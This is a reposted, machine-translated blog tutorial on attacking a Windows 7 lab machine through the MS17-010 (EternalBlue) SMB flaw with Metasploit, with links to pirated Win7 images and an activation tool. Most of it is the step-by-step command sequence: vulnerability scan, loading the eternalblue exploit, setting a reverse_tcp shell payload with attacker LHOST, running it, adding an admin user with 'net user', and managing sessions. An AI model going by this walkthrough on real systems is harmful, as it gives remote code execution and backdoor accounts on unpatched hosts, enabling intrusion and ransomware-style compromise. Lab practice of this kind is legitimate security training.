当前位置:网站首页>Network security Kali penetration learning introduction to web penetration using MSF penetration to attack win7 host and execute commands remotely

Network security Kali penetration learning introduction to web penetration using MSF penetration to attack win7 host and execute commands remotely

2022-06-11 21:00:00 InfoQ

Introduction to the environment

Overview of eternal blue :

Eternal blue means 2017 year 4 month 14 Friday night , Hacker groups ShadowBrokers( Shadow brokers ) Publish a large number of network attack tools , It includes “ Eternal Blue ” Tools ,“ Eternal Blue ” utilize Windows Systematic SMB The vulnerability can obtain the highest authority of the system .5 month 12 Japan , By reforming “ Eternal Blue ” Made wannacry Blackmail virus , The British 、 Russia 、 The whole Europe as well as China's many colleges and universities inside the network 、 Large enterprise intranet and government agency private network , Be blackmailed to pay a high ransom to decrypt the recovered files .

Official description :

The blue related virus of eternity , It's actually Microsoft MS17-010 Loophole .MS17-010 yes Windows A vulnerability in the underlying service of the system , Malicious code will scan open 445 Of the file share port Windows machine , No user action required , Just turn on the Internet , Lawbreakers can plant ransomware in computers and servers 、 Remote control Trojan 、 Malicious programs such as virtual currency mining machine .

Video version ↓:
Network security /kali/ hackers /web Security / Penetration test /-3-5 Monthly network security course - Xiaobai beginner to master

Text version ↓:
Practical projects done - Intranet actual shooting range environment - Penetration tools ” There are many penetrating thought maps !

adopt msf Module acquisition Win7 Host remote shell

Win7 Flagship Edition SP1-64 Bit system image ( There is an activation tool ): link :https://pan.baidu.com/s/1FueCa5Z9WUBbOWvL-Djwqw Extraction code :root

Win7 Flagship Edition SP1-64 Bit free installation version ( Activated ) password :123456, Download, unzip and use VMware Directly open to link :https://pan.baidu.com/s/1vlHNmdHBiPoidRmP5H7sHw Extraction code :4g96

If you want to install it yourself, you can download the image , You can download the installation free version if you don't want to install it yourself

The overall use process of the module is as follows

null
Let's first scan whether the target exists ms17-010 Loophole

msf6 > search ms17-010

null
Use use Command to select this module

msf6 > use auxiliary/scanner/smb/smb_ms17_010

View the information that the module needs to be configured

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

null
We need to configure RHOST host IP

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.56

Start scanning

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

null
The target looks vulnerable , This means that there may be related vulnerabilities .

Find attack modules

msf6 > search ms17-010

null
Use use Command loading module

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

null
Set target host IP

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.56

see exploit target The target type :

msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

null
You can see that there is only one module target, Therefore, the target system is selected by default . No need to set it manually .

We have configured the vulnerability related parameters , What to do next ?

null
Find one. payload, obtain shell After remote connection permission , To execute commands remotely , Because a module is specified by default when the module is loaded payload

null
If you don't want to use the default specified payload, You can find one yourself payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell type:payload

notes :payload Also known as attack payload , It is mainly used to establish a stable connection between the target machine and the attacker , You can go back to shell, Program injection can also be carried out .

Let's pick a rebound shell Of payloads

null
notes : When setting payload and windows There's a space between .

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp

Check it out. payloads What information needs to be configured

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options # View the loaded payload Information

null
Set up this machine payload Monitor address

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.53

After the configuration is completed, execute

exploit [ɪkˈsplɔɪt  Application ; utilize ; 
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

null
notes : If the wait doesn't appear shell You can press enter at the prompt . If you execute it directly, you will get the information of the target host SEHLL Use DOS Command create user

C:\Windows\system32>net user admin admin /add 

null
Garbled code is displayed, but the expansion has been successfully added : Solve the mess ( Garbled because windows and linux Because of different coding )

C:\Windows\system32>chcp 65001

To view the user

C:\Windows\system32>net user

null
You can see that the new user has been created successfully . View the user permissions obtained

C:\Windows\system32>whoami

null
Close links Ctrl+c

Abort session 1? [y/N] y

actual combat : Connect to the target through a session

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j 

-j Indicates background execution   After the penetration target is completed, a session  We can go through session Connect to the target host .

null
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions

null
Through conversation Id Enter the conversation

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2

null
Exit session save session to background

C:\Windows\system32>background

null
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions 

null
According to the conversation Id End the conversation

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2

null
Summarize the use of metasploit The steps of the attack :1、 lookup CVE Published vulnerabilities 2、 Find the corresponding exploit modular 3、 Configuration module parameters 4、 add to payload back door 5、 perform exploit Start the attack

Today's sharing is here , Need supporting information to find Xiaobian


原网站

版权声明
本文为[InfoQ]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/03/202203011712391845.html

边栏推荐

猜你喜欢

随机推荐